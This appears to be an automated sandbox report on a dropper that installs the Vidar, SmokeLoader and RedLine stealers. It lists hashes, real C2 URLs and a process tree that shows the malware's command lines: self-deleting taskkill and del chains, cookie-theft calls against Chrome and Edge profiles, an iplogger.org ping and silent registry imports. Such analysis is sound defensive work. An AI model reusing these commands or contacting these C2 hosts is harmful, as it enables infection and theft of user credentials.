Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    10s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    19-07-2021 22:53

General

  • Target

    8 (20).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel16

C2

dwarimlari.xyz:80

Signatures

  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 8 IoCs

    RedlineStealer.

  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 11 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Loads dropped DLL 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 18 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 8 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8 (20).exe
    "C:\Users\Admin\AppData\Local\Temp\8 (20).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:5020
      • C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:5108
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_1.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4080
          • C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\sonia_1.exe
            sonia_1.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4192
            • C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\sonia_1.exe
              "C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\sonia_1.exe" -a
              6⤵
              • Executes dropped EXE
              PID:1204
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_2.exe
          4⤵
            PID:4128
            • C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\sonia_2.exe
              sonia_2.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              PID:4164
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_3.exe
            4⤵
              PID:4056
              • C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\sonia_3.exe
                sonia_3.exe
                5⤵
                • Executes dropped EXE
                PID:2960
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                  6⤵
                    PID:5972
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im sonia_3.exe /f
                      7⤵
                      • Kills process with taskkill
                      PID:5028
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      7⤵
                      • Delays execution with timeout.exe
                      PID:6096
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c sonia_5.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4212
                • C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\sonia_5.exe
                  sonia_5.exe
                  5⤵
                  • Executes dropped EXE
                  PID:4216
                  • C:\Users\Admin\Documents\BrVXYyEXkQYJNHUjxQDYqb3C.exe
                    "C:\Users\Admin\Documents\BrVXYyEXkQYJNHUjxQDYqb3C.exe"
                    6⤵
                      PID:1468
                      • C:\Users\Admin\Documents\BrVXYyEXkQYJNHUjxQDYqb3C.exe
                        C:\Users\Admin\Documents\BrVXYyEXkQYJNHUjxQDYqb3C.exe
                        7⤵
                          PID:4172
                        • C:\Users\Admin\Documents\BrVXYyEXkQYJNHUjxQDYqb3C.exe
                          C:\Users\Admin\Documents\BrVXYyEXkQYJNHUjxQDYqb3C.exe
                          7⤵
                            PID:1860
                            • C:\Users\Admin\AppData\Local\Temp\7zS447CE875\setup_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\7zS447CE875\setup_install.exe"
                              8⤵
                                PID:408
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c karotima_2.exe
                                  9⤵
                                    PID:5344
                                    • C:\Users\Admin\AppData\Local\Temp\7zS447CE875\karotima_2.exe
                                      karotima_2.exe
                                      10⤵
                                        PID:3524
                                        • C:\Users\Admin\AppData\Local\Temp\7zS447CE875\karotima_2.exe
                                          "C:\Users\Admin\AppData\Local\Temp\7zS447CE875\karotima_2.exe" -a
                                          11⤵
                                            PID:5952
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c karotima_1.exe
                                        9⤵
                                          PID:5332
                                  • C:\Users\Admin\Documents\E_iHKI4fNW24e6PP5uZMKeCW.exe
                                    "C:\Users\Admin\Documents\E_iHKI4fNW24e6PP5uZMKeCW.exe"
                                    6⤵
                                      PID:4260
                                    • C:\Users\Admin\Documents\W2RMwbFjDeVlYOagOA9DrK54.exe
                                      "C:\Users\Admin\Documents\W2RMwbFjDeVlYOagOA9DrK54.exe"
                                      6⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4128
                                      • C:\Users\Admin\Documents\W2RMwbFjDeVlYOagOA9DrK54.exe
                                        C:\Users\Admin\Documents\W2RMwbFjDeVlYOagOA9DrK54.exe
                                        7⤵
                                          PID:1036
                                        • C:\Users\Admin\Documents\W2RMwbFjDeVlYOagOA9DrK54.exe
                                          C:\Users\Admin\Documents\W2RMwbFjDeVlYOagOA9DrK54.exe
                                          7⤵
                                            PID:3684
                                        • C:\Users\Admin\Documents\7p0ZP0EHs3JCiM0fU0QtoTdF.exe
                                          "C:\Users\Admin\Documents\7p0ZP0EHs3JCiM0fU0QtoTdF.exe"
                                          6⤵
                                            PID:1880
                                            • C:\Users\Admin\Documents\7p0ZP0EHs3JCiM0fU0QtoTdF.exe
                                              "C:\Users\Admin\Documents\7p0ZP0EHs3JCiM0fU0QtoTdF.exe" -a
                                              7⤵
                                                PID:3684
                                            • C:\Users\Admin\Documents\dU9HZsYVZW1kF1p0JzySlEdS.exe
                                              "C:\Users\Admin\Documents\dU9HZsYVZW1kF1p0JzySlEdS.exe"
                                              6⤵
                                                PID:2664
                                                • C:\Users\Admin\Documents\dU9HZsYVZW1kF1p0JzySlEdS.exe
                                                  C:\Users\Admin\Documents\dU9HZsYVZW1kF1p0JzySlEdS.exe
                                                  7⤵
                                                    PID:4528
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im dU9HZsYVZW1kF1p0JzySlEdS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\dU9HZsYVZW1kF1p0JzySlEdS.exe" & del C:\ProgramData\*.dll & exit
                                                      8⤵
                                                        PID:4188
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /im dU9HZsYVZW1kF1p0JzySlEdS.exe /f
                                                          9⤵
                                                          • Kills process with taskkill
                                                          PID:6084
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /t 6
                                                          9⤵
                                                          • Delays execution with timeout.exe
                                                          PID:6808
                                                  • C:\Users\Admin\Documents\gns8bYwjfBVdLmBU2UBi2wxG.exe
                                                    "C:\Users\Admin\Documents\gns8bYwjfBVdLmBU2UBi2wxG.exe"
                                                    6⤵
                                                      PID:3136
                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:1364
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:6108
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:3152
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                                PID:6588
                                                            • C:\Users\Admin\Documents\yTl2KnG85jIAXuWYi3WukLjf.exe
                                                              "C:\Users\Admin\Documents\yTl2KnG85jIAXuWYi3WukLjf.exe"
                                                              6⤵
                                                                PID:2740
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                  7⤵
                                                                    PID:4644
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd
                                                                      8⤵
                                                                        PID:5424
                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                          findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                          9⤵
                                                                            PID:5696
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                            Acre.exe.com k
                                                                            9⤵
                                                                              PID:6424
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                10⤵
                                                                                  PID:6712
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                    11⤵
                                                                                      PID:6920
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                        12⤵
                                                                                          PID:6844
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                            13⤵
                                                                                              PID:6096
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                14⤵
                                                                                                  PID:6436
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                    15⤵
                                                                                                      PID:2576
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                        16⤵
                                                                                                          PID:5868
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                            17⤵
                                                                                                              PID:7572
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                                18⤵
                                                                                                                  PID:8044
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping 127.0.0.1 -n 30
                                                                                                9⤵
                                                                                                • Runs ping.exe
                                                                                                PID:6984
                                                                                        • C:\Users\Admin\Documents\MrpMtyyC7PzI2SMZdof4eJf0.exe
                                                                                          "C:\Users\Admin\Documents\MrpMtyyC7PzI2SMZdof4eJf0.exe"
                                                                                          6⤵
                                                                                            PID:4292
                                                                                            • C:\Users\Admin\Documents\MrpMtyyC7PzI2SMZdof4eJf0.exe
                                                                                              C:\Users\Admin\Documents\MrpMtyyC7PzI2SMZdof4eJf0.exe
                                                                                              7⤵
                                                                                                PID:3600
                                                                                            • C:\Users\Admin\Documents\5XaTtAvb2bdhwwVDWFdvcyxR.exe
                                                                                              "C:\Users\Admin\Documents\5XaTtAvb2bdhwwVDWFdvcyxR.exe"
                                                                                              6⤵
                                                                                                PID:3904
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                                                                                  7⤵
                                                                                                    PID:812
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      explorer https://iplogger.org/2LBCU6
                                                                                                      8⤵
                                                                                                        PID:1224
                                                                                                      • C:\Windows\SysWOW64\regedit.exe
                                                                                                        regedit /s adj.reg
                                                                                                        8⤵
                                                                                                        • Runs .reg file with regedit
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4056
                                                                                                      • C:\Windows\SysWOW64\regedit.exe
                                                                                                        regedit /s adj2.reg
                                                                                                        8⤵
                                                                                                        • Runs .reg file with regedit
                                                                                                        PID:6476
                                                                                                    • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                                                                      "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                                                                      7⤵
                                                                                                        PID:2256
                                                                                                        • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                                                                          "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                                                                          8⤵
                                                                                                            PID:3404
                                                                                                      • C:\Users\Admin\Documents\VeG_x0K1Z9YjzEV1A7EmUfEI.exe
                                                                                                        "C:\Users\Admin\Documents\VeG_x0K1Z9YjzEV1A7EmUfEI.exe"
                                                                                                        6⤵
                                                                                                          PID:2904
                                                                                                          • C:\Users\Admin\Documents\VeG_x0K1Z9YjzEV1A7EmUfEI.exe
                                                                                                            C:\Users\Admin\Documents\VeG_x0K1Z9YjzEV1A7EmUfEI.exe
                                                                                                            7⤵
                                                                                                              PID:2332
                                                                                                          • C:\Users\Admin\Documents\xoPe8YOaN31W2lfUcttuYSXG.exe
                                                                                                            "C:\Users\Admin\Documents\xoPe8YOaN31W2lfUcttuYSXG.exe"
                                                                                                            6⤵
                                                                                                              PID:2852
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im xoPe8YOaN31W2lfUcttuYSXG.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\xoPe8YOaN31W2lfUcttuYSXG.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                7⤵
                                                                                                                  PID:5836
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /im xoPe8YOaN31W2lfUcttuYSXG.exe /f
                                                                                                                    8⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:1068
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout /t 6
                                                                                                                    8⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:2184
                                                                                                              • C:\Users\Admin\Documents\s4_L0vY6NV4eRKsty2rpEmkp.exe
                                                                                                                "C:\Users\Admin\Documents\s4_L0vY6NV4eRKsty2rpEmkp.exe"
                                                                                                                6⤵
                                                                                                                  PID:1860
                                                                                                                  • C:\Users\Admin\Documents\s4_L0vY6NV4eRKsty2rpEmkp.exe
                                                                                                                    C:\Users\Admin\Documents\s4_L0vY6NV4eRKsty2rpEmkp.exe
                                                                                                                    7⤵
                                                                                                                      PID:4160
                                                                                                                  • C:\Users\Admin\Documents\UNNWkKT4JyCrqn6VTGRaOT_c.exe
                                                                                                                    "C:\Users\Admin\Documents\UNNWkKT4JyCrqn6VTGRaOT_c.exe"
                                                                                                                    6⤵
                                                                                                                      PID:3872
                                                                                                                    • C:\Users\Admin\Documents\Qw6EHWkX0yYARMFF3s0AfjFk.exe
                                                                                                                      "C:\Users\Admin\Documents\Qw6EHWkX0yYARMFF3s0AfjFk.exe"
                                                                                                                      6⤵
                                                                                                                        PID:2660
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                          7⤵
                                                                                                                            PID:1860
                                                                                                                        • C:\Users\Admin\Documents\N3Sr3jhCfvkASNAtggtbBInY.exe
                                                                                                                          "C:\Users\Admin\Documents\N3Sr3jhCfvkASNAtggtbBInY.exe"
                                                                                                                          6⤵
                                                                                                                            PID:1148
                                                                                                                          • C:\Users\Admin\Documents\puEQi9FvoJKbXpost9Bpy7gP.exe
                                                                                                                            "C:\Users\Admin\Documents\puEQi9FvoJKbXpost9Bpy7gP.exe"
                                                                                                                            6⤵
                                                                                                                              PID:4396
                                                                                                                            • C:\Users\Admin\Documents\835FDEAi_9pY0m6QhflIySV2.exe
                                                                                                                              "C:\Users\Admin\Documents\835FDEAi_9pY0m6QhflIySV2.exe"
                                                                                                                              6⤵
                                                                                                                                PID:4412
                                                                                                                              • C:\Users\Admin\Documents\4ERFvlVgpQ5p_moK_jJKCiU0.exe
                                                                                                                                "C:\Users\Admin\Documents\4ERFvlVgpQ5p_moK_jJKCiU0.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:4968
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 680
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:5876
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 716
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:6128
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 1080
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:5488
                                                                                                                                • C:\Users\Admin\Documents\a8qqB7XZAe2zzNW6dtIhbcwj.exe
                                                                                                                                  "C:\Users\Admin\Documents\a8qqB7XZAe2zzNW6dtIhbcwj.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:4180
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                4⤵
                                                                                                                                  PID:1628
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:4152
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\sonia_6.exe
                                                                                                                                    sonia_6.exe
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:4224
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1432
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                        PID:1704
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:1800
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\sonia_4.exe
                                                                                                                                      sonia_4.exe
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:4244
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:2268
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:3664
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                              8⤵
                                                                                                                                                PID:1532
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                8⤵
                                                                                                                                                  PID:2544
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:3836
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                                                                                    8⤵
                                                                                                                                                      PID:3788
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:4288
                                                                                                                                                      • C:\Windows\winnetdriv.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626737548 0
                                                                                                                                                        8⤵
                                                                                                                                                          PID:4004
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:3908
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 776
                                                                                                                                                            8⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:4264
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 840
                                                                                                                                                            8⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:1456
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 888
                                                                                                                                                            8⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:2696
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 960
                                                                                                                                                            8⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:2700
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 840
                                                                                                                                                            8⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:216
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 988
                                                                                                                                                            8⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5412
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 1056
                                                                                                                                                            8⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5796
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:4336
                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 4336 -s 1016
                                                                                                                                                              8⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:4680
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:3116
                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2608
                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                    1⤵
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:4564
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                      2⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      PID:2432
                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2400
                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2380
                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                        1⤵
